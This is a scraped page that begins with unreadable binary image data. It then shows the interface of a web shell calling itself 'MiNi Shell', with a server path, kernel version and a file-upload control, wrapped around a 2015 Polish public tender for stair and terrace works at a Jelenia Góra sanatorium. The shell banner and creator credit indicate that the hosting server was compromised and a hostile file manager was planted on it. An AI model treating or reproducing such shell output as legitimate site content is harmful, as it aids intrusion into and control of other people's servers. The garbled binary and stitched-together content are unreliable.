JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20150323/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20150323/40033-N-2015.html

<p class="kh_header"><b>Jelenia Góra: DOSTOSOWANIE OBIEKTU DO WYMAGAŃ OBOWIĄZUJĄCYCH PRZEPISÓW TECHNICZNYCH I SANITARNYCH, REALIZOWANE W CZĘŚCIACH:


  CZĘŚĆ 1.  
  PRZEBUDOWA ZEWNĘTRZNYCH SCHODÓW WEJŚCIOWYCH DO BUDYNKU  GŁÓWNEGO ORAZ ROZBUDOWA TARASU REKREACYJNEGO OD STRONY  WSCHODNIEJ- PRZY PAWILONIE GASTRONOMICZNYM</b><br>
<b>Numer ogłoszenia: 40033 - 2015; data zamieszczenia: 23.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej Sanatorium Uzdrowiskowe MSW w Jeleniej Górze , ul. Cervi 14, 58-560 Jelenia Góra, woj. dolnośląskie, tel. 75 7552064 w.4026, faks 75 7551093.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sanatorium.agat.ta.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTOSOWANIE OBIEKTU DO WYMAGAŃ OBOWIĄZUJĄCYCH PRZEPISÓW TECHNICZNYCH I SANITARNYCH, REALIZOWANE W CZĘŚCIACH:


  CZĘŚĆ 1.  
  PRZEBUDOWA ZEWNĘTRZNYCH SCHODÓW WEJŚCIOWYCH DO BUDYNKU  GŁÓWNEGO ORAZ ROZBUDOWA TARASU REKREACYJNEGO OD STRONY  WSCHODNIEJ- PRZY PAWILONIE GASTRONOMICZNYM.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest  dostosowanie obiektu do wymagań obowiązujących przepisów technicznych                     i sanitarnych, realizowane w częściach. Przedmiot zamówienia dotyczy  Części 1.  pn. Przebudowa zewnętrznych schodów wejściowych do budynku  głównego oraz rozbudowa tarasu rekreacyjnego od strony  wschodniej- przy pawilonie gastronomicznym. Budynek zlokalizowany jest przy ul. Cervi 14 w Jeleniej Górze (kod 58-580) na działce oznaczonej geodezyjnie numerem 116, AM 3, obręb  0005 Cieplice V.Obiekty będą posadowione na warstwie piasków gliniastych o stopniu zagęszczenia ID=0,65 na głębokościach: -2,16;  -1,32  w stosunku do projektowanego poziomu posadzki wejścia głównego.
W obrębie projektowanego zamierzenia nie stwierdzono występowania ciągłego poziomu wody gruntowej. Ustalono również proste warunki gruntowe i określono I kategorię geotechniczną obiektu.
Zgodnie z zapisem w Miejscowym Planie Zagospodarowania Przestrzennego dla dzielnicy Cieplice w Jeleniej Górze, przedmiotowa inwestycja uzyskała Decyzję Nr 1495/14 - Pozwolenie na podejmowanie innych działań przy zabytku,wydaną  18.12.2014r. przez Dolnośląskiego Wojewódzkiego Konserwatora Zabytków we Wrocławiu, Delegatura      w Jeleniej Górze.
  Na realizację zadania- Zamawiający posiada Decyzję nr 77/2015 z 23.02.2015 r.  zatwierdzającą projekt budowlany   i udzielającą pozwolenie na budowę, wydana przez Prezydenta Miasta Jeleniej Góry.
W budynku, podczas wykonywania robót budowlanych prowadzona jest statutowa działalność uzdrowiskowo-lecznicza. 

 Wg opisu technicznego do PB:
     W ramach inwestycji projektuje się:
1.1 Przebudowę schodów wejściowych do budynku głównego.
Dotychczasowy jeden bieg schodowy będzie podzielony na trzy mniejsze biegi, przedzielone betonowymi donicami na trzech poziomach wysokości. W strefie bezpośredniego wejścia do budynku będą zlokalizowane siedziska w formie
Ławek oraz dodatkowe donice z roślinnością. Nowoprojektowane schody zostaną wykonane jako prefabrykowane żelbetowe, donice w dwóch najniższych poziomach zostaną oblicowane płytami z betonu architektonicznego, donice najwyższej kondygnacji zostaną oblicowane deską kompozytową. Nawierzchnia przed wejściem do budynku
zostanie wykonana z płyt betonowych tarasowych. Nad wejściem głównym znajduje się istniejące zadaszenie w którym projektuje się wymianę oświetlenia na nowe wraz z przebudową podwieszanego sufitu, zadaszenie zostanie oblicowane deską. Przed wejściem do budynku zostaną ustawione ławki, kosze na odpady stałe oraz donice z roślinnością.





1.2  Rozbudowę tarasu rekreacyjnego.
Istniejące schody na taras zostaną wymienione na nowe prefabrykowane żelbetowe, przy nich powstanie betonowa donica oblicowana płytami z betonu architektonicznego, jak przy wejściu głównym do budynku. Przy tarasie powstaną nowe schody wykonane jako prefabrykowane żelbetowe. Nawierzchnia tarasu zostanie wymieniona na płyty betonowe tarasowe, zastosowane przy wejściu do budynku połączone z deską tarasową kompozytową. Część tarasu zostanie przykryta zadaszeniem przeciwsłonecznym w postaci pergoli mocowanej do muru ograniczającego taras - oblicowanego płytami z betonu architektonicznego oraz do istniejącej elewacji I piętra budynku. 
Na tarasie projektuje się ponadto siedziska drewniane na postumentach betonowych, ławki, kosze na śmieci oraz donice   z roślinności. Istniejące schody przy tarasie zlokalizowane od strony istniejącej pochylni dla osób niepełnosprawnych zostaną oblicowane deską kompozytową. Projekt przewiduje lokalizację nowoprojektowanych schodów od strony istniejącej alei pieszej. Taras zostanie oświetlony poprzez punkty świetlne umieszczone w nawierzchni, po obrysie zewnętrznym tarasu.
    Rozwiązania materiałowe.

Ściany fundamentowe, żelbetowe o grubości 35cm z betonu, zbrojone stalą. Ściany zbrojone siatką z prętów fi 8        o oczkach 15cmx15cm przy każdej zewnętrznej krawędzi. Ściany fundamentowe zaprojektowane na obciążenie pionowe Q=30,00 KN/mb.
Płyta dociskowa tarasowa o grubości 12cm w poziomie (-0,14) z betonu , zbrojona stalą .Płyty zbrojone siatką            z prętów fi8 o oczkach 15cmx15cm dołem oraz siatką z prętów fi8 o oczkach 15cmx15cm górą. Po obwodzie płyty siatki łączone prętami (tzw. biglami) fi 8 w rozstawie co 15cm. Płyty zaprojektowano na charakterystyczne obciążenie użytkowe qk = 12,0 kN/m2. Pod płytą tarasową -  warstwa chudego betonu o grubości 10cm.
Ściany donic o grubości 15cm z betonu , zbrojone stalą. Ściany zbrojone siatką z prętów fi 8 o oczkach 15cmx15cm przy zewnętrznych krawędziach ściany. W narożnikach ścian siatki łączone prętami (tzw. biglami) fi 8 w rozstawie co
15cm.Gzymsy pionowe i poziome zbrojone prętami fi8 w postaci otwartych strzemion w
rozstawie co 15cm. Ściany donic zaprojektowano na charakterystyczne obciążenie naziomem qk = 5,0kN/m2.
Pod ścianami donic - warstwa chudego betonu o grubości 10cm.
Schody zewnętrze  płytowe żelbetowe ,w postaci gotowych prefabrykatów z betonu o wykończonej nawierzchni. Schody montowane na ścianach fundamentowych na zaprawie cementowej . Zbrojenie schodów wykonane
w zakładzie prefabrykacji,  z  uwzględnieniem obciążenia stałego i użytkowego oraz występującego podczas rozformowania, transportu i montażu na placu budowy.
Podpory stalowe pod słupy drewniane  wykonane indywidualnie wg rysunków szczegółowych ze stali. Po wykonaniu podpór w zakładzie ślusarskim każdy element stalowy -zabezpieczony antykorozyjnie i pomalowany farbą proszkową. Elementy _pergoli_ na tarasie rekreacyjnym z drewna, impregnowane przeciwko korozji biologicznej preparatem bezbarwnym.



    Powierzchnia zabudowy schodów wejściowych 145,52 m2
Powierzchnia zabudowy tarasu rekreacyjnego
- powierzchnia  tarasu rekreacyjnego   168,27 m2
- powierzchnia tarasu rekreacyjnego wraz z projektowanymi schodami   177,55 m2.

   Orientacyjne wielkości robót podstawowych 
      Roboty ziemne                    248,5 m3  +   87,7 m3
      Nawierzchnie                       114,2 m2 + 142,4 m2
      Okładziny                              196,8 m2 + 119,8 m2

2.  Szczegółowy opis przedmiotu zamówienia  zawarty jest w Rozdziale  III.  Specyfikacji Istotnych Warunków Zamówienia  pn.  Opis przedmiotu zamówienia,  ogólnie zwanym Dokumentacją projektową ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.51.10-1, 45.11.12.00-0, 45.26.27.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 123.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Każdy wykonawca zobowiązany jest zabezpieczyć składaną ofertę wadium w wysokości:  15 000 PLN    (słownie: piętnaście tysięcy złotych ).
2. Wadium może być wniesione w następujących formach:
a)	 pieniądzu
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej z  tym, że    poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)	  gwarancjach bankowych,
d)	  gwarancjach ubezpieczeniowych,
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 09.11.2000 r.  o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jednolity z 2007r. Dz. U. Nr 42,  poz. 275,  z późniejszymi zmianami).







3.  W przypadku składania przez wykonawcę wadium w formie gwarancji lub poręczeń  -  dokumenty te powinny    być sporządzone zgodnie z obowiązującym prawem i winny zawierać następujące elementy:
a)	 nazwę dającego zlecenie (wykonawcy), beneficjenta gwarancji lub poręczenia ( Zamawiającego),  
  gwaranta ( banku lub instytucji udzielających gwarancji lub poręczenia ) oraz wskazanie ich siedzib,
b)	  określenie wierzytelności, która ma być zabezpieczona gwarancją lub poręczeniem,
c)	  kwotę gwarancji lub poręczenia,
d)	  termin ważności gwarancji lub poręczenia ,
  e)   zobowiązanie gwaranta do bezwarunkowego i nieodwołalnego zapłacenia  kwoty gwarancji lub poręczenia na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie :
- że  wykonawca,  w odpowiedzi na wezwanie, o którym mowa w art. 26 ust.3 upzp.  nie złożył dokumentów lub oświadczeń, o których mowa w art.25.ust.1 upzp. lub  pełnomocnictw, a nie udowodnił, że nie wynikało to z przyczyn leżących po jego stronie,
lub
-  że wykonawca ,  którego ofertę wybrano:
        - odmówił podpisania umowy na warunkach określonych w ofercie,     lub
        - nie wniósł zabezpieczenia należytego wykonania umowy,    lub
        - zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
W przypadku, gdy gwarancje lub poręczenia nie będą zabezpieczały w pełnym zakresie możliwych roszczeń Zamawiającego - Wykonawca zostanie wykluczony z postępowania.

4.   Wadium w formie gwarancji  lub poręczeń  nie podlega  przeniesieniu na osoby trzecie.
5.  Wadium wnoszone w pieniądzu należy wpłacić - wyłącznie przelewem na rachunek Zamawiającego,  otwarty    w  PLN : BGK  0. Wrocław  55 1130 1033 0018 8182 1920 0004  adnotacją w tytule wpłaty :  Wadium - przebudowa_ schody i taras.
6.   Wadium wnoszone w innej, niż  pieniądz  dopuszczonej przez Zamawiającego formie _formach wykonawca wnosi do Zamawiającego  przy czym,  w takim przypadku za termin doręczenia uważa się datę jego zdeponowania w sekretariacie Dyrektora - pokój nr 19 ,parter budynku głównego, w godzinach urzędowania. 
7. Wadium w innej, niż pieniądz dopuszczonej  przez Zamawiającego, formie /formach wykonawca może  dołączyć do oferty - pod warunkiem,  że umieszczone zostanie w osobnej  kopercie  opisanej ( nazwa wykonawcy, adnotacja: Wadium - przebudowa_ schody i taras), w sposób umożliwiający Zamawiającemu zdeponowanie wadium, przed upływem terminu  otwarcia  ofert - bez konieczności naruszenia  koperty,          w której znajduje się oferta. 
8.  Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium  w  pieniądzu  za pomocą  przelewu bankowego Zamawiający będzie uważał za skuteczne wówczas, gdy Bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert. 
      Dołączenie do oferty kopii polecenia przelewu wystawionego przez wykonawcę jest niewystarczającym warunkiem do stwierdzenia, przez Zamawiającego, terminowego wniesienia wadium przez wykonawcę.
9.   Zamawiający zwróci niezwłocznie wadium według zasad określonych w art. 46 upzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku.
                Wykonawca potwierdza spełnienie tego warunku poprzez złożenie  oświadczenia wg wzoru stanowiącego Załącznik nr 2.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien wskazać do uczestnictwa w wykonaniu niniejszego zamówienia w szczególności osobę odpowiedzialną za kierowanie robotami budowlanymi i pełniącą funkcję 
(a)	Kierownika Budowy   posiadającego :
                           - uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności        konstrukcyjno-budowlanej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów        

Jeżeli wskazana wyżej osoba jest  obywatelem państw członkowskich Unii Europejskiej i nabyła w tych państwach, poza granicami Rzeczypospolitej Polskiej, kwalifikacje zawodowe do wykonywania samodzielnych funkcji w budownictwie, mając na względzie obowiązujące w Polsce przepisy prawa krajowego wymagane jest od tej osoby uznanie jej kwalifikacji zawodowych.

Zamawiający uzna warunek za spełniony w oparciu o  złożone przez Wykonawcę stosowne oświadczenie       i wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnej za kierowanie robotami budowlanymi.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże: 
a)	dysponowanie środkami finansowymi lub posiadaną zdolnością kredytową (lub środkami finansowymi  i zdolnością kredytową)  - w wysokości co najmniej 300 000  PLN;

b)	że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej               z przedmiotem zamówienia na kwotę minimum  500 000 PLN.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>jeżeli Wykonawca, wykazując spełnienie warunków , o których mowa w art.22.ust.1 upzp, polega na zasobach innych podmiotów na zasadach określonych w art.26 ust.2b upzp, Zamawiający, w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów żąda:
(a)	pisemnego zobowiązania innych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia ( w oryginale) - wg wzoru stanowiącego załącznik nr 6;
(b)	Informację banku  lub spółdzielczej kasy oszczędnościowo - kredytowej potwierdzającą  wysokość posiadanych środków finansowych lub zdolność kredytową  tego podmiotu , wystawioną nie wcześniej niż 3 miesiące przed upływem terminu  składania ofert- jeżeli udostępnia zasoby na potwierdzenie sytuacji ekonomicznej i finansowej</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - Termin realizacji- wyłacznie w przypadku skrocenia terminu zakończenia realizacji zadania o co najmniej 1 miesiąc=31 dni - 2</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sanatorium-agat.pl;  link:BIP; zakładka przetargi;<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ze strony internetowej - nieodpłatnie; w wersji papierowej - w ciągu 5 dni od daty złożenia wniosku z potwierdzeniem wniesienia opłaty w wysokości 80zł..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.04.2015 godzina 10:00, miejsce: SP ZOZ Sanat.Uzdrowisk. MSW AGAT ul.Cervi 14, 58-560 Jelenia Góra lub bezpośrednio w sekretar.-pok. nr 19, parter bud.głównego (adres jw) w godz.08:00-15:00 (poza sobotą,niedzielą,świętami).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> W postępowaniu mogą wziąć udział wykonawcy, których  Zamawiający nie wykluczy z postępowania                   o udzielenie zamówienia publicznego za to, że w okresie 3lat przed wszczęciem postępowania, w sposób zawiniony wykonawca poważnie naruszył   obowiązki  zawodowe, w szczególności, gdy wykonawca w wyniku      
zamierzonego działania lub rażącego niedbalstwa nie wykonał  lub nienależycie wykonał zamówienie, co Zamawiający jest w stanie wykazać za pomocą dowolnych środków dowodowych ( art. 24 ust.2a. upzp).</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com